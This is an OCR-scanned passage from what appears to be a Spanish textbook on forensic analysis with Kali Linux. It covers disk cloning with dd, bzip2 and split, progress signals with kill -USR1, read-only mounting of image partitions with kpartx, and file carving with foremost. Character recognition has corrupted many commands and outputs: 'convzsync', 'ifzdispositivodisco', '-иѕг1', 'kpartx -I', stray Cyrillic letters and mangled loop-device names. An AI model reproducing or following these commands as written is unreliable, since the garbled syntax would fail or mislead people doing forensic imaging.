otro lado IPreceptor es la IP de la máquina que está recibiendo la imagen, y puerto el 
puerto que hemos puesto a la escucha. 


Si lo que queremos es generar una imagen partida en varios ficheros más 
pequenos, y además emplear compresión, lo haremos con: 


dd convzsync,noerror ifzdispositivodisco bs=tambloque | bzip2 -9f | 
split -d -b tamfich - prefijo 


Donde dispositivodisco será el dispositivo de disco que queramos clonar 
-el origen, por lo tanto-, y tambloque es el tamano de bloque, y hace que dd lea 
de tambloque en tambloque, acelerando el proceso. tambloque debe ser 4096 en 
la mayor parte de los discos, salvo en los Western Digital, que debe ser de 512. El 
parámetro tamfich corresponde con el tamaño de los ficheros partidos; y prefijo el 
prefijo de los ficheros creados; por ejemplo, si se crean tres ficheros de salida, se 
llamarán prefijo00, prefijo01 y prefijo02. 


Como vemos, comprimimos antes de partir con split, y comprimimos con 
compresión máxima; por lo que no es extraño que tengamos tasas de compresión 
altas, y podamos incluso llegar a almacenar un disco de 4T'B en dos discos de 512 
GB. 


Es posible siempre recuperar la imagen a partir de los trozos anteriores. 


cat ‘Is prefijo, | sort‘ | bunzip2 > imagen.img 


Donde prefijo es el prefijo de los ficheros creados anteriormente, y será 
imagen.img la imagen que estamos generando. 


Un problema que tiene dd es que es poco verboso en la salida. Y es probable 
que tengamos al notario detrás nuestro preguntando de forma reiterada “¿Falta 
mucho?”. Para saber cuanto llevamos clonado o transferido, una forma es mirar 
el archivo de salida; pero si estamos generando una salida comprimida, es poco 
ilustrativo de cuanto realmente llevamos. Otra forma de saberlo es ir a otra consola, 
y hacer: 


kill -USR1 pid 
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Donde pid es el PID del proceso dd, que podemos obtener con el comando 
ps. 


Podemos hacer que dd genere una realimentación con lo que lleva avanzado, 
haciendo desde otra consola: 


while “true”; do kill -иѕг1 pid; sleep segundos; done 


Donde pid es el PID del proceso dd, que podemos obtener con el comando 
ps; y segundos el numero de segundos entre avisos. Recomiendo poner 10 segundos, 
para que interfiera lo mínimo. 


10.2 USO DE KALI EN ANÁLISIS FORENSE. VISIÓN Y EDICIÓN DE IMÁGENES DE 
DISCO 
Es recomendable que trabajemos con volcados de discos enteros, no con 
volcados de particiones; ya que podemos tener información de gran importancia de 
naturaleza forense fuera de las particiones. 


El problema de trabajar con imágenes de discos enteros es que no podemos 
montar la imagen sin más. Hay que dar un paso intermedio. Para ello, utilizaremos 
la utilidad kpartx, que tiene como sintaxis: 


kpartx -a imagen.img 


Siendo imagen.img la imagen sobre la que estamos trabajando; y que crea en 
[dev/mapper una serie de dispositivos loop que corresponden a las particiones de la 
imagen, y que luego podremos montar con mount. Podemos también ver cuales son 
las particiones de una imagen, haciendo: 


kpartx -I imagen.img 


оол 


Finalmente, no olvidemos montar la partición сор la opción -o ro. Si lo 
hacemos de otra forma, todo el esfuerzo para respetar la integridad de la imagen no 
habrá valido para nada. 


Por ejemplo, para ver qué particiones tiene una imagen y dónde se crearían, 
crear las imágenes, y montar una partición como de solo lectura, haremos primero: 


kpartx -a imagenAnalisis.img 
Después vemos las particiones con: 


kpartx -I imagenAnalisis.img 
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Obteniendo: 


оор1р1 : Ө 7775397 /dev/loopl 63 
loop1p3 : Ө 16065 /dev/loop1 7775460 
100р1р4 : Ө 16065 /dev/loop1 7791525 


Vemos el contenido del directorio /dev/mapper: 


Is -1 /dev/mapper/ 


Obteniendo: 


ontrol 
00pOp1 


00p0p3 
oopop4 





Y podemos montar en /media/pericia como de solo lectura la primera 
partición haciendo: 


mount /dev/mapper/loop0p1 /mnt -o ro 


10.3 USO DE KALI EN ANÁLISIS FORENSE. DATA CARVING 


Una de las tareas que tendremos que hacer con relativa frecuencia es la 
recuperación de archivos de una imagen. O porque se han borrado voluntariamente, 
0 porque se han borrado accidentalmente, o como restos vía temporales borrados de 
algün tipo de actividad que estemos analizando. 


El primer planteamiento para la recuperación de datos es el "undelete" 
estándar; pero solo funciona cuando hace muy poco uso del disco que el archivo se 
borró. 


Sin embargo, existe otro planteamiento: el llamado file carving o data 
carving. Básicamente consiste en, utilizando una expresión regular que modele un 
tipo concreto de fichero, o su firma de cabecera, recorrer toda la imagen del disco 
buscando esa expresión regular o esa firma de cabecera. Esto tiene el inconveniente 
de que genera muchos falsos positivos -por ejemplo, un video en MPG con frecuencia 
es identificado tanto como video como muchas imágenes consecutivas-, así como 
que recupera muchos archivos destrozados, que ya no es posible visualizar. Pero 
tiene la ventaja de que si hay restos de algo, lo va a encontrar; y restos de una imagen 
o de un PDF van a dar mucho juego desde el punto de vista de la informática forense. 
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Para hacer data carving tenemos dos utilidades: scalpel, que suele fallar, y 
foremost, que funciona muy bien. La forma de lanzar foremost es con: 


foremost -t tipo -i imagen -o salida 


Donde tipo es el tipo de fichero que queramos extraer —como por ejemplo, 
jpg-. imagen el fichero sobre el que queremos hacer el data carving, y salida el 
directorio dónde se quieren grabar los datos. Por ejemplo, si hacemos: 


foremost -i imagenDisco.img 


Hará un data carving completo, buscando cualquier tipo de fichero que 
conozca, sobre imagenDisco.img. Creará un directorio denominado output, dónde 
encontraremos un fichero audit.txt con un informe de lo encontrado. Y enel susodicho 
directorio output encontraremos a su vez un subdirectorio por cada tipo de archivo. 
Los ficheros encontrados estarán cada uno en un directorio denominado como su 
tipo, teniendo como nombre de fichero el sector dónde comienza lo encontrado, y la 
extensión del tipo. 


Es importante que recordemos que el tipo lo debemos indicar sin el punto; es 
decir, si queremos extraer los archivos JPG, haremos: 


foremost -t jpg -i imagen -o salida 
En lugar de: 
foremost -t .jpg -i imagen -o salida 


Que no funcionará. 


10.4 USO DE KALI EN ANÁLISIS FORENSE. OTRAS UTILIDADES 


Otras utilidades que pueden ser interesantes para hacer un análisis forense y 
que son difíciles de encuadrar son: 


V vol: análisis forense de memoria RAM y particiones de swap. 
Y xxd: permite generar volcados hexadecimales de ficheros binarios. 
Y pdfresurect: permite hacer análisis forense sobre ficheros PDF. 


Y pOf: fingerprinting pasivo, para identificar ataques Man in the Middle. 
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